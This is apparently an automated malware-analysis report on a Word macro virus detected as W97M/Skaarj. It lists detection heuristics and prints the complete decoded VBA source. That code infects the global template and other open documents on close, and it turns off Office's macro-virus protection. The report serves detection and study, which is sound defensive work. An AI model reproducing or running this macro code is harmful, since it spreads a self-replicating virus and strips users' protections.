MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1553.005 Mark-of-the-Web Bypass
The sample is identified as W97M/Skaarj by ClamAV, a known macro virus family. The VBA macro code explicitly attempts to replicate itself into other Word documents, as indicated by the 'OLE_VBA_MACRO_VIRUS_REPLICATION' heuristic. The macro also displays various hardcoded messages to the user, suggesting a form of user interaction or distraction.
Heuristics 4
-
ClamAV: Doc.Trojan.Skaarj-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Skaarj-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
C.CodeModule.DeleteLines t, C.CodeModule.ProcCountLines("Document_Close", vbext_pk_Proc) -
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 45,569 bytes but its declared streams total only 24,330 bytes — 21,239 bytes (47%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5027 bytes |
SHA-256: 968597552690d9d2c134ae6660a38454aa9e87b06a793f94b2ec5ceefa927e9a |
|||
|
Detection
ClamAV:
Doc.Trojan.Skaarj-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
Const MarkSign = "Mazdai II (Free-Harm Built) Version 2.2 © SKAARJ Y2K"
On Error GoTo handler
Dim WDoc As Word.Document, M As Object, C As Object, Infected As Boolean, Found As Boolean
Dim Saved As Boolean, Mon As String, Phrase As Byte, t As Long, i As Long, N As Boolean, Process As Byte
Set M = Nothing
N = False
Process = 0
Mon = GetSetting("Visdata", "Engines", "sizeX")
If Mon = "" Then
SaveSetting "Visdata", "Engines", "sizeX", Month(Now)
ElseIf Mon - Month(Now) <> 0 Then
If Rnd * 20 < 1 Then
Do
Phrase = Int(12 * Rnd)
Loop While Phrase > 11
Select Case Phrase
Case 0: MsgBox "Nowhere to run, nowhere to hide ", vbExclamation, "Mazdai II"
Case 1: MsgBox "Life is short - boost yourself", vbExclamation, "Mazdai II"
Case 3: MsgBox "It's nice to be important, but it's more important to be nice ;-)" & vbCrLf & "Scooter", vbExclamation, "Mazdai II"
Case 4: MsgBox "I have no mouth and I must scream", vbExclamation, "Mazdai II"
Case 5: MsgBox "Death is not punishment - it is disposal", vbExclamation, "Mazdai II"
Case 6: MsgBox "Trust no one", vbExclamation, "Mazdai II"
Case 7: MsgBox "Forget the past - work for the future", vbExclamation, "Mazdai II"
Case 8: MsgBox "Time is NOW!", vbExclamation, "Mazdai II"
Case 9: MsgBox "SMILE! :~)", vbExclamation, "Mazdai II"
Case 10: MsgBox "Touch the SKY!", vbExclamation, "Mazdai II"
Case 11: MsgBox "The truth is out there", vbExclamation, "Mazdai II"
End Select
End If
End If
Found = False
For Each C In NormalTemplate.VBProject.VBComponents
If C.Type = 100 Then
If C.CodeModule.Find(MarkSign, 1, 1, 100000, 100000) Then
Found = True
Set M = C.CodeModule
End If
End If
Next
Do
For Each WDoc In Word.Documents
If WDoc.SaveFormat = wdFormatDocument Or WDoc.SaveFormat = wdFormatTemplate Then
For Each C In WDoc.VBProject.VBComponents
If C.Type = 100 Then
If C.CodeModule.Find(MarkSign, 1, 1, 100000, 100000) Then
Set M = C.CodeModule
Found = True
ElseIf Found Then
Saved = WDoc.Saved
On Error GoTo handler
t = C.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc)
C.CodeModule.DeleteLines t, C.CodeModule.ProcCountLines("Document_Close", vbext_pk_Proc)
out:
C.CodeModule.InsertLines t, M.Lines(M.ProcBodyLine("Document_Close", vbext_pk_Proc), M.ProcCountLines("Document_Close", vbext_pk_Proc))
With Dialogs(wdDialogFileSummaryInfo)
.Title = "Surprise!!!"
.Author = "SKAARJ"
.Comments = "This is a second virus of SKAARJ from RUSSIA. This virus will not harm your system - it's only a test"
.Keywords = "SKAARJ, Virii, HTP, Experiment, Mazdai II"
End With
If Saved Then WDoc.Save
Infected = True
End If
End If
Next
End If
Next
Process = Process + 1
If Process = 3 Then Exit Do
Loop Until Infected
If Found Then
For Each C In NormalTemplate.VBProject.VBComponents
If C.Type = 100 Then
If Not C.CodeModule.Find(MarkSign, 1, 1, 100000, 100000) Then
Saved = NormalTemplate.Saved
N = True
t = C.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc)
C.CodeModule.DeleteLines t, C.CodeModule.ProcCountLines("Document_Close", vbext_pk_Proc)
out1:
C.CodeModule.InsertLines t, M.Lines(M.ProcBodyLine("Document_Close", vbext_pk_Proc), M.ProcCountLines("Document_Close", vbext_pk_Proc))
If Saved Then NormalTemplate.Save
End If
End If
Next
End If
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
Exit Sub
handler:
t = 1
If N = False Then
Resume out
Else
Resume out1
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.